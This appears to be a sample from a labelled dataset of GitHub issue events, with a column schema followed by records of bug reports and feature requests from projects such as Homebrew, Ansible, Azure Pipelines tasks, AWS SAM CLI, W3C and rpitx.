Dataset schema (column, dtype, observed range / distinct values):

Column        Type           Range / values
------        ----           --------------
Unnamed: 0    int64          1 to 832k
id            float64        2.49B to 32.1B
type          stringclasses  1 value
created_at    stringlengths  19 to 19
repo          stringlengths  7 to 112
repo_url      stringlengths  36 to 141
action        stringclasses  3 values
title         stringlengths  3 to 438
labels        stringlengths  4 to 308
body          stringlengths  7 to 254k
index         stringclasses  7 values
text_combine  stringlengths  96 to 254k
label         stringclasses  2 values
text          stringlengths  96 to 246k
binary_label  int64          0 to 1
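The schema above can be checked programmatically once the dataset is in a pandas DataFrame. A minimal sketch follows; the rows here are illustrative stand-ins built by hand from the first two sample records, not a load of the real file, and the DataFrame construction is an assumption for demonstration only:

```python
import pandas as pd

# Illustrative rows mirroring the schema above (not the real dataset).
df = pd.DataFrame({
    "id": [24509339230.0, 3868584765.0],
    "type": ["IssuesEvent", "IssuesEvent"],
    "created_at": ["2022-10-10 19:39:57", "2016-04-10 01:55:30"],
    "repo": ["web3phl/bio", "Homebrew/legacy-homebrew"],
    "action": ["opened", "closed"],
    "index": ["main", "main"],
    "binary_label": [1, 1],
})

# created_at is stored as a fixed-width 19-character string
# (hence stringlengths 19 to 19); parse it into real datetimes.
df["created_at"] = pd.to_datetime(df["created_at"], format="%Y-%m-%d %H:%M:%S")

# binary_label is the 0/1 target column; inspect the class balance.
print(df["binary_label"].value_counts())
```

The same pattern (`nunique()` on `type` and `action`, `str.len()` on the text columns) reproduces the class counts and length ranges reported in the schema.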
4,750
24,509,339,230
IssuesEvent
2022-10-10 19:39:57
web3phl/bio
https://api.github.com/repos/web3phl/bio
opened
move the domain to bio.web3philippines.org
chore maintainers only tweak
Create a copy of the site from the main site to `bio.web3philippines.org` subdomain.
True
move the domain to bio.web3philippines.org - Create a copy of the site from the main site to `bio.web3philippines.org` subdomain.
main
move the domain to bio org create a copy of the site from the main site to bio org subdomain
1
511
3,868,584,765
IssuesEvent
2016-04-10 01:55:30
Homebrew/legacy-homebrew
https://api.github.com/repos/Homebrew/legacy-homebrew
closed
Secure Homebrew Installation Without SSL
maintainer feedback
There have been a few threads on the insecurity of having the download snippet on non-SSL http://brew.sh. Two possibilities that I haven't seen suggested, and which circumvent the need for SSL: 1. (Simpler, but may require newbies an extra step): Instead of linking in several places from secure GitHub pages to the unsecure homepage, flip the links and host the snippet on GitHub (e.g. in the readme), pointing there from the homepage 2. (Keeps the instructions on the homepage, and gives savvy users the opportunity to maintain their security, but at the expense that naive users will still be vulnerable): Create a checksum file for the installer and sign it with your PGP key. [This is what Ubuntu does](https://help.ubuntu.com/community/VerifyIsoHowto).
True
Secure Homebrew Installation Without SSL - There have been a few threads on the insecurity of having the download snippet on non-SSL http://brew.sh. Two possibilities that I haven't seen suggested, and which circumvent the need for SSL: 1. (Simpler, but may require newbies an extra step): Instead of linking in several places from secure GitHub pages to the unsecure homepage, flip the links and host the snippet on GitHub (e.g. in the readme), pointing there from the homepage 2. (Keeps the instructions on the homepage, and gives savvy users the opportunity to maintain their security, but at the expense that naive users will still be vulnerable): Create a checksum file for the installer and sign it with your PGP key. [This is what Ubuntu does](https://help.ubuntu.com/community/VerifyIsoHowto).
main
secure homebrew installation without ssl there have been a few threads on the insecurity of having the download snippet on non ssl two possibilities that i haven t seen suggested and which circumvent the need for ssl simpler but may require newbies an extra step instead of linking in several places from secure github pages to the unsecure homepage flip the links and host the snippet on github e g in the readme pointing there from the homepage keeps the instructions on the homepage and gives savvy users the opportunity to maintain their security but at the expense that naive users will still be vulnerable create a checksum file for the installer and sign it with your pgp key
1
781,314
27,432,346,973
IssuesEvent
2023-03-02 03:03:53
w3c/w3c-website
https://api.github.com/repos/w3c/w3c-website
closed
Profile missing description terms
medium priority website accessibility
On the profile page there is a `<dl>` which presents information about the user; affilliation, location, github id etc. There is an icon to visually indicate what each definition row contains. There is no alternative text for this icon so it may not be clear what each definition is. <img width="345" alt="screen shot of the profile definition list" src="https://user-images.githubusercontent.com/2444840/222102233-3026af33-b040-4e2f-9d3b-fd3d5a0db853.png"> **Expected behavior** Include alternative text for the icons. The approach taken for the preferred email address icon should be sufficient. ``` <span class="visuallyhidden">preferred email address</span> <span class="fas fa-star" aria-hidden="true" title="preferred email"></span> ```
1.0
Profile missing description terms - On the profile page there is a `<dl>` which presents information about the user; affilliation, location, github id etc. There is an icon to visually indicate what each definition row contains. There is no alternative text for this icon so it may not be clear what each definition is. <img width="345" alt="screen shot of the profile definition list" src="https://user-images.githubusercontent.com/2444840/222102233-3026af33-b040-4e2f-9d3b-fd3d5a0db853.png"> **Expected behavior** Include alternative text for the icons. The approach taken for the preferred email address icon should be sufficient. ``` <span class="visuallyhidden">preferred email address</span> <span class="fas fa-star" aria-hidden="true" title="preferred email"></span> ```
non_main
profile missing description terms on the profile page there is a which presents information about the user affilliation location github id etc there is an icon to visually indicate what each definition row contains there is no alternative text for this icon so it may not be clear what each definition is img width alt screen shot of the profile definition list src expected behavior include alternative text for the icons the approach taken for the preferred email address icon should be sufficient preferred email address
0
1,799
6,575,913,527
IssuesEvent
2017-09-11 17:48:49
ansible/ansible-modules-core
https://api.github.com/repos/ansible/ansible-modules-core
closed
Mount With Complex Password Hangs Forever
affects_2.1 bug_report waiting_on_maintainer
<!--- Verify first that your issue/request is not already reported in GitHub --> ##### ISSUE TYPE <!--- Pick one below and delete the rest: --> - Bug Report ##### COMPONENT NAME <!--- Name of the plugin/module/task --> mount ##### ANSIBLE VERSION <!--- Paste verbatim output from “ansible --version” between quotes below --> ``` $ ansible --version ansible 2.1.1.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION <!--- Mention any settings you have changed/added/removed in ansible.cfg (or using the ANSIBLE_* environment variables). --> No changes were made to ansible configuration. ##### OS / ENVIRONMENT <!--- Mention the OS you are running Ansible from, and the OS you are managing, or say “N/A” for anything that is not platform-specific. --> ubuntu 12.04 (target host) ubuntu 14.04 (ansible controller) ##### SUMMARY <!--- Explain the problem briefly --> When a mount password is provided that has unacceptable characters, fstab is not parsed properly which results in /bin/mount prompting for a password. This causes the mount command to hang silently forever. ##### STEPS TO REPRODUCE <!--- For bugs, show exactly how to reproduce the problem. For new features, show how the feature would be used. --> We're mounting an NFS drive, which (eventually) uses AD as the auth mechanism. I don't believe that contributes to the issue. The whole issue seems to be that /bin/mount is asking for stdin. <!--- Paste example playbooks or commands between quotes below --> ``` - name: setup NFS host hosts: nfs_host vars: mount_password: 'MyPassword/["HasFunnyCharacters' tasks: - name: mount nfs share mount: name: "/mnt/myshare" src: "//myshare/somedir" fstype: "cifs" opts: "domain=mydomain,user=myuser,password={{ mount_password }}" state: mounted ``` <!--- You can also paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- What did you expect to happen when running the steps above? 
--> I believe that mount should timeout or die rather quickly if input is requested but unavailable. I realize there are various other mount options to use to avoid this scenario, but it would be nice if the mount module handled the input request in some elegant way and fail out. ##### ACTUAL RESULTS <!--- What actually happened? If possible run with extra verbosity (-vvvv) --> Mount will hang forever when `/bin/mount /mnt/myshare` is called. <!--- Paste verbatim command output between quotes below -->
True
Mount With Complex Password Hangs Forever - <!--- Verify first that your issue/request is not already reported in GitHub --> ##### ISSUE TYPE <!--- Pick one below and delete the rest: --> - Bug Report ##### COMPONENT NAME <!--- Name of the plugin/module/task --> mount ##### ANSIBLE VERSION <!--- Paste verbatim output from “ansible --version” between quotes below --> ``` $ ansible --version ansible 2.1.1.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION <!--- Mention any settings you have changed/added/removed in ansible.cfg (or using the ANSIBLE_* environment variables). --> No changes were made to ansible configuration. ##### OS / ENVIRONMENT <!--- Mention the OS you are running Ansible from, and the OS you are managing, or say “N/A” for anything that is not platform-specific. --> ubuntu 12.04 (target host) ubuntu 14.04 (ansible controller) ##### SUMMARY <!--- Explain the problem briefly --> When a mount password is provided that has unacceptable characters, fstab is not parsed properly which results in /bin/mount prompting for a password. This causes the mount command to hang silently forever. ##### STEPS TO REPRODUCE <!--- For bugs, show exactly how to reproduce the problem. For new features, show how the feature would be used. --> We're mounting an NFS drive, which (eventually) uses AD as the auth mechanism. I don't believe that contributes to the issue. The whole issue seems to be that /bin/mount is asking for stdin. 
<!--- Paste example playbooks or commands between quotes below --> ``` - name: setup NFS host hosts: nfs_host vars: mount_password: 'MyPassword/["HasFunnyCharacters' tasks: - name: mount nfs share mount: name: "/mnt/myshare" src: "//myshare/somedir" fstype: "cifs" opts: "domain=mydomain,user=myuser,password={{ mount_password }}" state: mounted ``` <!--- You can also paste gist.github.com links for larger files --> ##### EXPECTED RESULTS <!--- What did you expect to happen when running the steps above? --> I believe that mount should timeout or die rather quickly if input is requested but unavailable. I realize there are various other mount options to use to avoid this scenario, but it would be nice if the mount module handled the input request in some elegant way and fail out. ##### ACTUAL RESULTS <!--- What actually happened? If possible run with extra verbosity (-vvvv) --> Mount will hang forever when `/bin/mount /mnt/myshare` is called. <!--- Paste verbatim command output between quotes below -->
main
mount with complex password hangs forever issue type bug report component name mount ansible version ansible version ansible config file etc ansible ansible cfg configured module search path default w o overrides configuration mention any settings you have changed added removed in ansible cfg or using the ansible environment variables no changes were made to ansible configuration os environment mention the os you are running ansible from and the os you are managing or say “n a” for anything that is not platform specific ubuntu target host ubuntu ansible controller summary when a mount password is provided that has unacceptable characters fstab is not parsed properly which results in bin mount prompting for a password this causes the mount command to hang silently forever steps to reproduce for bugs show exactly how to reproduce the problem for new features show how the feature would be used we re mounting an nfs drive which eventually uses ad as the auth mechanism i don t believe that contributes to the issue the whole issue seems to be that bin mount is asking for stdin name setup nfs host hosts nfs host vars mount password mypassword hasfunnycharacters tasks name mount nfs share mount name mnt myshare src myshare somedir fstype cifs opts domain mydomain user myuser password mount password state mounted expected results i believe that mount should timeout or die rather quickly if input is requested but unavailable i realize there are various other mount options to use to avoid this scenario but it would be nice if the mount module handled the input request in some elegant way and fail out actual results mount will hang forever when bin mount mnt myshare is called
1
4,196
6,423,784,590
IssuesEvent
2017-08-09 11:59:44
Microsoft/vsts-tasks
https://api.github.com/repos/Microsoft/vsts-tasks
closed
Azure App Service Deploy: ERROR_FILE_IN_USE (even with Take App Offline + Rename locked files)
Area: Release AzureAppService
Lately we've been seeing frequent failures in our VSTS releases of our ASP .NET Core app with output like the following (edited for privacy/clarity): ``` [command]"C:\Program Files\IIS\Microsoft Web Deploy V3\msdeploy.exe" -verb:sync -source:package='package.zip' -dest:contentPath='mysite',ComputerName='https://mysite.scm.azurewebsites.net:443/msdeploy.axd?site=mysite',UserName='********',Password='********',AuthType='Basic' -enableRule:AppOffline -enableRule:DoNotDeleteRule -userAgent:myagent --- ##[error]Failed to deploy web package to App Service. ##[warning]Try to deploy app service again with Rename locked files option selected. ##[error]Error Code: ERROR_FILE_IN_USE More Information: Web Deploy cannot modify the file '***.exe' on the destination because it is locked by an external process. In order to allow the publish operation to succeed, you may need to either restart your application to release the lock, or use the AppOffline rule handler for .Net applications on your next publish attempt. Learn more at: http://go.microsoft.com/fwlink/?LinkId=221672#ERROR_FILE_IN_USE. Error count: 1. ##[error]Error: C:\Program Files\IIS\Microsoft Web Deploy V3\msdeploy.exe failed with return code: 4294967295 ``` We are on task version 3.3.12. We have both "Take App Offline" and "Rename locked files" checked. It appears that -enableRule:AppOffline is being passed to MSDeploy.exe. We're not sure if this is a bug in the VSTS task, in MSDeploy, or in Azure App Service. It appears that similar feedback was reported [here](https://developercommunity.visualstudio.com/content/problem/18621/the-take-app-offline-option-in-deploy-step-doesnt.html), but was dismissed as "Not a Bug" with the suggested workaround being to use a separate task to take the app offline/online. If the task can't (for whatever reason) guarantee to take the app offline, then the "Take App Offline" option should be removed from the task entirely.
1.0
Azure App Service Deploy: ERROR_FILE_IN_USE (even with Take App Offline + Rename locked files) - Lately we've been seeing frequent failures in our VSTS releases of our ASP .NET Core app with output like the following (edited for privacy/clarity): ``` [command]"C:\Program Files\IIS\Microsoft Web Deploy V3\msdeploy.exe" -verb:sync -source:package='package.zip' -dest:contentPath='mysite',ComputerName='https://mysite.scm.azurewebsites.net:443/msdeploy.axd?site=mysite',UserName='********',Password='********',AuthType='Basic' -enableRule:AppOffline -enableRule:DoNotDeleteRule -userAgent:myagent --- ##[error]Failed to deploy web package to App Service. ##[warning]Try to deploy app service again with Rename locked files option selected. ##[error]Error Code: ERROR_FILE_IN_USE More Information: Web Deploy cannot modify the file '***.exe' on the destination because it is locked by an external process. In order to allow the publish operation to succeed, you may need to either restart your application to release the lock, or use the AppOffline rule handler for .Net applications on your next publish attempt. Learn more at: http://go.microsoft.com/fwlink/?LinkId=221672#ERROR_FILE_IN_USE. Error count: 1. ##[error]Error: C:\Program Files\IIS\Microsoft Web Deploy V3\msdeploy.exe failed with return code: 4294967295 ``` We are on task version 3.3.12. We have both "Take App Offline" and "Rename locked files" checked. It appears that -enableRule:AppOffline is being passed to MSDeploy.exe. We're not sure if this is a bug in the VSTS task, in MSDeploy, or in Azure App Service. It appears that similar feedback was reported [here](https://developercommunity.visualstudio.com/content/problem/18621/the-take-app-offline-option-in-deploy-step-doesnt.html), but was dismissed as "Not a Bug" with the suggested workaround being to use a separate task to take the app offline/online. 
If the task can't (for whatever reason) guarantee to take the app offline, then the "Take App Offline" option should be removed from the task entirely.
non_main
azure app service deploy error file in use even with take app offline rename locked files lately we ve been seeing frequent failures in our vsts releases of our asp net core app with output like the following edited for privacy clarity c program files iis microsoft web deploy msdeploy exe verb sync source package package zip dest contentpath mysite computername enablerule appoffline enablerule donotdeleterule useragent myagent failed to deploy web package to app service try to deploy app service again with rename locked files option selected error code error file in use more information web deploy cannot modify the file exe on the destination because it is locked by an external process in order to allow the publish operation to succeed you may need to either restart your application to release the lock or use the appoffline rule handler for net applications on your next publish attempt learn more at error count error c program files iis microsoft web deploy msdeploy exe failed with return code we are on task version we have both take app offline and rename locked files checked it appears that enablerule appoffline is being passed to msdeploy exe we re not sure if this is a bug in the vsts task in msdeploy or in azure app service it appears that similar feedback was reported but was dismissed as not a bug with the suggested workaround being to use a separate task to take the app offline online if the task can t for whatever reason guarantee to take the app offline then the take app offline option should be removed from the task entirely
0
4,744
24,480,406,174
IssuesEvent
2022-10-08 19:00:12
centerofci/mathesar
https://api.github.com/repos/centerofci/mathesar
opened
Closing the context menu should not pass the click through
type: bug work: frontend status: ready restricted: maintainers
## Steps to reproduce 1. Select one table cell. 1. Open the context menu within that table cell. 1. With the context menu still open, click on another table cell. 1. Observe the context menu to close (good). 1. Expect your original selection to remain unchanged because your click was intended only to close the menu. (In testing other products, clicking to close a context menu does not ever seem to pass the click through.) 1. Instead, observe that the click has been ass through modifying the cell selection.
True
Closing the context menu should not pass the click through - ## Steps to reproduce 1. Select one table cell. 1. Open the context menu within that table cell. 1. With the context menu still open, click on another table cell. 1. Observe the context menu to close (good). 1. Expect your original selection to remain unchanged because your click was intended only to close the menu. (In testing other products, clicking to close a context menu does not ever seem to pass the click through.) 1. Instead, observe that the click has been ass through modifying the cell selection.
main
closing the context menu should not pass the click through steps to reproduce select one table cell open the context menu within that table cell with the context menu still open click on another table cell observe the context menu to close good expect your original selection to remain unchanged because your click was intended only to close the menu in testing other products clicking to close a context menu does not ever seem to pass the click through instead observe that the click has been ass through modifying the cell selection
1
3,663
14,952,086,855
IssuesEvent
2021-01-26 15:08:16
zoj613/polya-gamma
https://api.github.com/repos/zoj613/polya-gamma
closed
MAINT: Update the hybrid sampler.
maintainance
The hybrid sampler needs to be updated now that all methods have been implemented. Windle et al (2014) has recommendations for a hybrid sampler in page 24. I need to run some benchmarks to adapt the recommendations to this implementation.
True
MAINT: Update the hybrid sampler. - The hybrid sampler needs to be updated now that all methods have been implemented. Windle et al (2014) has recommendations for a hybrid sampler in page 24. I need to run some benchmarks to adapt the recommendations to this implementation.
main
maint update the hybrid sampler the hybrid sampler needs to be updated now that all methods have been implemented windle et al has recommendations for a hybrid sampler in page i need to run some benchmarks to adapt the recommendations to this implementation
1
42,101
10,818,863,722
IssuesEvent
2019-11-08 13:09:23
ESA-VirES/WebClient-Framework
https://api.github.com/repos/ESA-VirES/WebClient-Framework
closed
Products in the sources list outside of the requested time interval.
defect
When, e.g., data from 2019-08-27 up to 2019-08-28 are requested data from 2019-08-27T00:00:00Z up to 2019-08-27T23:59:59Z will be correctly returned. The sources list however contains also `SW_OPER_MAGA_LR_1B_20190828T000000_20190828T235959_0505_MDR_MAG_LR` (the next day) even though the requested time span does not overlap two days.
1.0
Products in the sources list outside of the requested time interval. - When, e.g., data from 2019-08-27 up to 2019-08-28 are requested data from 2019-08-27T00:00:00Z up to 2019-08-27T23:59:59Z will be correctly returned. The sources list however contains also `SW_OPER_MAGA_LR_1B_20190828T000000_20190828T235959_0505_MDR_MAG_LR` (the next day) even though the requested time span does not overlap two days.
non_main
products in the sources list outside of the requested time interval when e g data from up to are requested data from up to will be correctly returned the sources list however contains also sw oper maga lr mdr mag lr the next day even though the requested time span does not overlap two days
0
226,934
17,367,784,143
IssuesEvent
2021-07-30 09:42:47
mvahowe/proskomma-js
https://api.github.com/repos/mvahowe/proskomma-js
closed
Autogenerate GraphQL Documentation
Graph documentation
- [x] Find a way to put html documentation online, preferably in readthedocs - [x] Add documentation strings throughout the graph
1.0
Autogenerate GraphQL Documentation - - [x] Find a way to put html documentation online, preferably in readthedocs - [x] Add documentation strings throughout the graph
non_main
autogenerate graphql documentation find a way to put html documentation online preferably in readthedocs add documentation strings throughout the graph
0
5,784
2,793,977,133
IssuesEvent
2015-05-11 14:25:22
NUKnightLab/StoryMapJS
https://api.github.com/repos/NUKnightLab/StoryMapJS
closed
Require Mapbox access token when using Mapbox base layer
ready to test
As part of changes to Mapbox's service, loading the javascript now requires an access token. We now understand that this access token is used for billing, so we should require that users enter their own access token, which should be used [when loading Mapbox tiles](https://github.com/NUKnightLab/StoryMapJS/blob/master/source/js/map/leaflet/VCO.Map.Leaflet.js#L177). Near the field where we request this from users, we can link to [this Mapbox page](https://www.mapbox.com/help/define-access-token/) which gives more information. Since there are maps in the wild depending upon our access token, we should continue to use it as a default, but the authoring tool should insist that new maps created to use Mapbox layers be accompanied by a new access token. To the extent possible, we should also force users editing existing maps using Mapbox to enter their own access token, but if that seems like a snarl, we could break that into a separate issue and prioritize it separately.
1.0
Require Mapbox access token when using Mapbox base layer - As part of changes to Mapbox's service, loading the javascript now requires an access token. We now understand that this access token is used for billing, so we should require that users enter their own access token, which should be used [when loading Mapbox tiles](https://github.com/NUKnightLab/StoryMapJS/blob/master/source/js/map/leaflet/VCO.Map.Leaflet.js#L177). Near the field where we request this from users, we can link to [this Mapbox page](https://www.mapbox.com/help/define-access-token/) which gives more information. Since there are maps in the wild depending upon our access token, we should continue to use it as a default, but the authoring tool should insist that new maps created to use Mapbox layers be accompanied by a new access token. To the extent possible, we should also force users editing existing maps using Mapbox to enter their own access token, but if that seems like a snarl, we could break that into a separate issue and prioritize it separately.
non_main
require mapbox access token when using mapbox base layer as part of changes to mapbox s service loading the javascript now requires an access token we now understand that this access token is used for billing so we should require that users enter their own access token which should be used near the field where we request this from users we can link to which gives more information since there are maps in the wild depending upon our access token we should continue to use it as a default but the authoring tool should insist that new maps created to use mapbox layers be accompanied by a new access token to the extent possible we should also force users editing existing maps using mapbox to enter their own access token but if that seems like a snarl we could break that into a separate issue and prioritize it separately
0
350,448
10,490,484,470
IssuesEvent
2019-09-25 09:06:00
ballerina-platform/lsp4intellij
https://api.github.com/repos/ballerina-platform/lsp4intellij
closed
Add line-based code actions support
Priority/Normal Type/New Feature
**Description:** Currently we only support diagnostics bound code actions and the aforementioned feature is available in the vs code language client. Basically we will have to add a caret listener and send a code actions request each time when the caret position is changed. **Suggested Labels:** <!-- Optional comma separated list of suggested labels. Non committers can’t assign labels to issues, so this will help issue creators who are not a committer to suggest possible labels--> **Suggested Assignees:** <!--Optional comma separated list of suggested team members who should attend the issue. Non committers can’t assign issues to assignees, so this will help issue creators who are not a committer to suggest possible assignees--> **Affected Product Version:** **OS, DB, other environment details and versions:** **Steps to reproduce:** **Related Issues:** <!-- Any related issues such as sub tasks, issues reported in other repositories (e.g component repositories), similar problems, etc. -->
1.0
Add line-based code actions support - **Description:** Currently we only support diagnostics bound code actions and the aforementioned feature is available in the vs code language client. Basically we will have to add a caret listener and send a code actions request each time when the caret position is changed. **Suggested Labels:** <!-- Optional comma separated list of suggested labels. Non committers can’t assign labels to issues, so this will help issue creators who are not a committer to suggest possible labels--> **Suggested Assignees:** <!--Optional comma separated list of suggested team members who should attend the issue. Non committers can’t assign issues to assignees, so this will help issue creators who are not a committer to suggest possible assignees--> **Affected Product Version:** **OS, DB, other environment details and versions:** **Steps to reproduce:** **Related Issues:** <!-- Any related issues such as sub tasks, issues reported in other repositories (e.g component repositories), similar problems, etc. -->
non_main
add line based code actions support description currently we only support diagnostics bound code actions and the aforementioned feature is available in the vs code language client basically we will have to add a caret listener and send a code actions request each time when the caret position is changed suggested labels suggested assignees affected product version os db other environment details and versions steps to reproduce related issues
0
5,384
27,063,121,197
IssuesEvent
2023-02-13 21:29:25
aws/aws-sam-cli
https://api.github.com/repos/aws/aws-sam-cli
reopened
sam local start-api fails to move /var/rapid/aws-lambda-rie-x86_64 in docker image for serverless function
type/bug area/local/start-api stage/needs-investigation stage/bug-repro maintainer/need-followup
<!-- Make sure we don't have an existing Issue that reports the bug you are seeing (both open and closed). If you do find an existing Issue, re-open or add a comment to that Issue instead of creating a new one. --> ### Description: Accessing a lambda using a custom docker image with python awslambdaric fails with: samcli.commands.local.cli_common.user_exceptions.ImageBuildException: Error building docker image: The command '/bin/sh -c mv /var/rapid/aws-lambda-rie-x86_64 /var/rapid/aws-lambda-rie && chmod +x /var/rapid/aws-lambda-rie' returned a non-zero code: 1 ### Steps to reproduce: <!-- Provide detailed steps to replicate the bug, including steps from third party tools (CDK, etc.) --> Create a serverless function with a custom docker image that uses awslambdaric try to access it through an HttpApi locally. ### Observed result: ``` Invoking Container created from httphandler:latest Image was not found. Removing rapid images for repo httphandler Building image.............. Failed to build Docker Image NoneType: None Exception on / [GET] Traceback (most recent call last): File "flask/app.py", line 2447, in wsgi_app File "flask/app.py", line 1952, in full_dispatch_request File "flask/app.py", line 1821, in handle_user_exception File "flask/_compat.py", line 39, in reraise File "flask/app.py", line 1950, in full_dispatch_request File "flask/app.py", line 1936, in dispatch_request File "samcli/local/apigw/local_apigw_service.py", line 357, in _request_handler File "samcli/commands/local/lib/local_lambda.py", line 144, in invoke File "samcli/lib/telemetry/metric.py", line 230, in wrapped_func File "samcli/local/lambdafn/runtime.py", line 177, in invoke File "samcli/local/lambdafn/runtime.py", line 88, in create File "samcli/local/docker/lambda_container.py", line 94, in __init__ File "samcli/local/docker/lambda_container.py", line 236, in _get_image File "samcli/local/docker/lambda_image.py", line 164, in build File "samcli/local/docker/lambda_image.py", line 278, in 
_build_image samcli.commands.local.cli_common.user_exceptions.ImageBuildException: Error building docker image: The command '/bin/sh -c mv /var/rapid/aws-lambda-rie-x86_64 /var/rapid/aws-lambda-rie && chmod +x /var/rapid/aws-lambda-rie' returned a non-zero code: 1 2022-05-19 01:01:55 127.0.0.1 - - [19/May/2022 01:01:55] "GET / HTTP/1.1" 502 - ``` ### Expected result: Should just work or tell how to fix the issue with moving rapid/aws-lambda-rie ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Fedora 2. `sam --version`: 1.50.0 3. AWS region: us-east-1
True
sam local start-api fails to move /var/rapid/aws-lambda-rie-x86_64 in docker image for serverless function - <!-- Make sure we don't have an existing Issue that reports the bug you are seeing (both open and closed). If you do find an existing Issue, re-open or add a comment to that Issue instead of creating a new one. --> ### Description: Accessing a lambda using a custom docker image with python awslambdaric fails with: samcli.commands.local.cli_common.user_exceptions.ImageBuildException: Error building docker image: The command '/bin/sh -c mv /var/rapid/aws-lambda-rie-x86_64 /var/rapid/aws-lambda-rie && chmod +x /var/rapid/aws-lambda-rie' returned a non-zero code: 1 ### Steps to reproduce: <!-- Provide detailed steps to replicate the bug, including steps from third party tools (CDK, etc.) --> Create a serverless function with a custom docker image that uses awslambdaric try to access it through an HttpApi locally. ### Observed result: ``` Invoking Container created from httphandler:latest Image was not found. Removing rapid images for repo httphandler Building image.............. 
Failed to build Docker Image NoneType: None Exception on / [GET] Traceback (most recent call last): File "flask/app.py", line 2447, in wsgi_app File "flask/app.py", line 1952, in full_dispatch_request File "flask/app.py", line 1821, in handle_user_exception File "flask/_compat.py", line 39, in reraise File "flask/app.py", line 1950, in full_dispatch_request File "flask/app.py", line 1936, in dispatch_request File "samcli/local/apigw/local_apigw_service.py", line 357, in _request_handler File "samcli/commands/local/lib/local_lambda.py", line 144, in invoke File "samcli/lib/telemetry/metric.py", line 230, in wrapped_func File "samcli/local/lambdafn/runtime.py", line 177, in invoke File "samcli/local/lambdafn/runtime.py", line 88, in create File "samcli/local/docker/lambda_container.py", line 94, in __init__ File "samcli/local/docker/lambda_container.py", line 236, in _get_image File "samcli/local/docker/lambda_image.py", line 164, in build File "samcli/local/docker/lambda_image.py", line 278, in _build_image samcli.commands.local.cli_common.user_exceptions.ImageBuildException: Error building docker image: The command '/bin/sh -c mv /var/rapid/aws-lambda-rie-x86_64 /var/rapid/aws-lambda-rie && chmod +x /var/rapid/aws-lambda-rie' returned a non-zero code: 1 2022-05-19 01:01:55 127.0.0.1 - - [19/May/2022 01:01:55] "GET / HTTP/1.1" 502 - ``` ### Expected result: Should just work or tell how to fix the issue with moving rapid/aws-lambda-rie ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Fedora 2. `sam --version`: 1.50.0 3. AWS region: us-east-1
main
sam local start api fails to move var rapid aws lambda rie in docker image for serverless function make sure we don t have an existing issue that reports the bug you are seeing both open and closed if you do find an existing issue re open or add a comment to that issue instead of creating a new one description accessing a lambda using a custom docker image with python awslambdaric fails with samcli commands local cli common user exceptions imagebuildexception error building docker image the command bin sh c mv var rapid aws lambda rie var rapid aws lambda rie chmod x var rapid aws lambda rie returned a non zero code steps to reproduce create a serverless function with a custom docker image that uses awslambdaric try to access it through an httpapi locally observed result invoking container created from httphandler latest image was not found removing rapid images for repo httphandler building image failed to build docker image nonetype none exception on traceback most recent call last file flask app py line in wsgi app file flask app py line in full dispatch request file flask app py line in handle user exception file flask compat py line in reraise file flask app py line in full dispatch request file flask app py line in dispatch request file samcli local apigw local apigw service py line in request handler file samcli commands local lib local lambda py line in invoke file samcli lib telemetry metric py line in wrapped func file samcli local lambdafn runtime py line in invoke file samcli local lambdafn runtime py line in create file samcli local docker lambda container py line in init file samcli local docker lambda container py line in get image file samcli local docker lambda image py line in build file samcli local docker lambda image py line in build image samcli commands local cli common user exceptions imagebuildexception error building docker image the command bin sh c mv var rapid aws lambda rie var rapid aws lambda rie chmod x var rapid aws lambda rie 
returned a non zero code get http expected result should just work or tell how to fix the issue with moving rapid aws lambda rie additional environment details ex windows mac amazon linux etc os fedora sam version aws region us east
1
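A plausible cause of the failed `mv /var/rapid/aws-lambda-rie-x86_64` step in the record above is an architecture mismatch: SAM CLI names the Runtime Interface Emulator binary per architecture, so the x86_64 file may simply be absent from the build layer when the host and image architectures disagree. A minimal sketch of that naming logic (the mapping and helper name are illustrative assumptions, not SAM CLI code):

```python
import platform

def rie_binary_name(machine: str) -> str:
    """Map a platform.machine() value to the per-architecture RIE binary name.

    If the image was built for a different architecture than the host, the
    expected file (e.g. aws-lambda-rie-x86_64) has nothing to back it, and the
    Dockerfile's `mv` step fails exactly as in the report.
    """
    mapping = {
        "x86_64": "aws-lambda-rie-x86_64",
        "amd64": "aws-lambda-rie-x86_64",
        "aarch64": "aws-lambda-rie-arm64",
        "arm64": "aws-lambda-rie-arm64",
    }
    try:
        return mapping[machine]
    except KeyError:
        raise ValueError(f"unsupported architecture: {machine}")

# Example: on the reporting machine this would resolve to the x86_64 binary.
local_binary = rie_binary_name(platform.machine()) if platform.machine() in (
    "x86_64", "amd64", "aarch64", "arm64") else None
```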
2,473
8,639,906,971
IssuesEvent
2018-11-23 22:35:15
F5OEO/rpitx
https://api.github.com/repos/F5OEO/rpitx
closed
Running setTime.py continuously
V1 related (not maintained)
Hi, I would like to use rpitx to run a DCF77 transmitter in my house. I would like it to be running 24 hours a day, just going and going. setTime.py appears to only run a certain number of minutes before quitting. I know I could repeatedly start it up using cron, but is there a nicer solution? Thanks Matt
True
Running setTime.py continuously - Hi, I would like to use rpitx to run a DCF77 transmitter in my house. I would like it to be running 24 hours a day, just going and going. setTime.py appears to only run a certain number of minutes before quitting. I know I could repeatedly start it up using cron, but is there a nicer solution? Thanks Matt
main
running settime py continuously hi i would like to use rpitx to run a transmitter in my house i would like it to be running hours a day just going and going settime py appears to only run a certain number of minutes before quitting i know i could repeatedly start it up using cron but is there a nicer solution thanks matt
1
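A nicer alternative to repeatedly starting setTime.py from cron, as asked in the record above, is a small supervisor that restarts the script whenever it exits. A minimal sketch (the script name and delay are illustrative):

```python
import subprocess
import time

def run_forever(cmd, restart_delay=1.0, max_restarts=None):
    """Re-run `cmd` each time it exits; stop after max_restarts if given.

    With max_restarts=None this loops indefinitely, which keeps a
    fixed-duration transmitter script running around the clock.
    """
    restarts = 0
    while max_restarts is None or restarts < max_restarts:
        subprocess.run(cmd)
        restarts += 1
        time.sleep(restart_delay)
    return restarts
```

Usage would be something like `run_forever(["python", "setTime.py"])`; a systemd unit with `Restart=always` achieves the same effect without any wrapper code.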
92,638
11,694,511,090
IssuesEvent
2020-03-06 04:20:49
evdotjs/my-projects
https://api.github.com/repos/evdotjs/my-projects
closed
[todo-list] re-design ui
design
